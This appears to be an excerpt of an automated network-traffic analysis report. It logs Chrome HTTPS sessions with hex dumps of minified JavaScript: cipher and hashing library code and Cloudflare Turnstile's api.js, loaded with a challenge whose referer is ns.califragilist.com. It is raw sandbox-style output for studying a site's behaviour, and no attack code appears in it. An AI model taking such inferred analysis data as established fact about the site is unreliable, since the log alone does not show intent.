                                                                                                                                              Data Ascii: (){for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<
                                                                                                                                              2024-11-06 15:55:35 UTC1369INData Raw: 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c
                                                                                                                                              Data Ascii: >0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<
                                                                                                                                              2024-11-06 15:55:35 UTC1369INData Raw: 74 2e 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69
                                                                                                                                              Data Ascii: t.buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stri
                                                                                                                                              2024-11-06 15:55:35 UTC1369INData Raw: 72 20 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49
                                                                                                                                              Data Ascii: r o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHI
                                                                                                                                              2024-11-06 15:55:35 UTC1369INData Raw: 2a 61 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61
                                                                                                                                              Data Ascii: *a.abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}va
                                                                                                                                              2024-11-06 15:55:35 UTC1369INData Raw: 33 2c 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62
                                                                                                                                              Data Ascii: 3,A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              30192.168.2.1849780104.18.95.414432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:35 UTC383OUTGET /turnstile/v0/b/22755d9a86c9/api.js HTTP/1.1
                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: */*
                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:36 UTC471INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:36 GMT
                                                                                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                                                                                              Content-Length: 47672
                                                                                                                                              Connection: close
                                                                                                                                              accept-ranges: bytes
                                                                                                                                              last-modified: Mon, 28 Oct 2024 19:08:47 GMT
                                                                                                                                              cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                              access-control-allow-origin: *
                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 8de644ce7fef45ee-DFW
                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                              2024-11-06 15:55:36 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 75 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 6e 28 66 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                              Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                                                                                              2024-11-06 15:55:36 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                              Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                              2024-11-06 15:55:36 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                                                                              Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function D(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(l[0
                                                                                                                                              2024-11-06 15:55:36 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                                                                                              Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var q;(fu
                                                                                                                                              2024-11-06 15:55:36 UTC1369INData Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20
                                                                                                                                              Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($||($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var
                                                                                                                                              2024-11-06 15:55:36 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28
                                                                                                                                              Data Ascii: }function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(
                                                                                                                                              2024-11-06 15:55:36 UTC1369INData Raw: 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 66 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4d 28 6b 72 2c 28 6c 3d 28 72 3d 65 2e 64
                                                                                                                                              Data Ascii: ).concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(f)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,g=M(kr,(l=(r=e.d
                                                                                                                                              2024-11-06 15:55:36 UTC1369INData Raw: 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 6c 2c 67 29 7b 76 61 72 20 68 3d 5b 6e 75 6c 6c 5d 3b 68 2e 70 75 73 68 2e 61 70 70 6c 79
                                                                                                                                              Data Ascii: sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,l,g){var h=[null];h.push.apply
                                                                                                                                              2024-11-06 15:55:36 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 6c 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 6c 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 6c 2e 63 6f 64 65 3d 63 2c 6c 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 65 29 7b 72 65 74
                                                                                                                                              Data Ascii: call(this,o),Me(Be(l),"code",void 0),l.name="TurnstileError",l.code=c,l}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))}function ze(e){ret
                                                                                                                                              2024-11-06 15:55:36 UTC1369INData Raw: 64 69 76 22 29 3b 75 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 75 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 75 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 75 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 75 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 75 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 75 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 75 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30
                                                                                                                                              Data Ascii: div");u.style.position="fixed",u.style.zIndex="2147483646",u.style.width="100vw",u.style.height="100vh",u.style.top="0",u.style.left="0",u.style.transformOrigin="center center",u.style.overflowX="hidden",u.style.overflowY="auto",u.style.background="rgba(0


                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                              31192.168.2.1849781104.18.94.414432212C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                              2024-11-06 15:55:36 UTC803OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/6d6nj/0x4AAAAAAAxa-jBUtWqCblw0/auto/fbE/normal/auto/ HTTP/1.1
                                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                                              Connection: keep-alive
                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                                              Sec-Fetch-Dest: iframe
                                                                                                                                              Referer: https://ns.califragilist.com/
                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                              2024-11-06 15:55:36 UTC1362INHTTP/1.1 200 OK
                                                                                                                                              Date: Wed, 06 Nov 2024 15:55:36 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Content-Length: 26468
                                                                                                                                              Connection: close
                                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                              permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                              content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                                                                                              cross-origin-embedder-policy: require-corp
                                                                                                                                              cross-origin-opener-policy: same-origin
                                                                                                                                              cross-origin-resource-policy: cross-origin
                                                                                                                                              origin-agent-cluster: ?1
                                                                                                                                              accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                              critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                              referrer-policy: same-origin
                                                                                                                                              document-policy: js-profiling
                                                                                                                                              2024-11-06 15:55:36 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 65 36 34 34 63 65 39 62 35 37 34 35 66 36 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: Server: cloudflareCF-RAY: 8de644ce9b5745f6-DFWalt-svc: h3=":443"; ma=86400
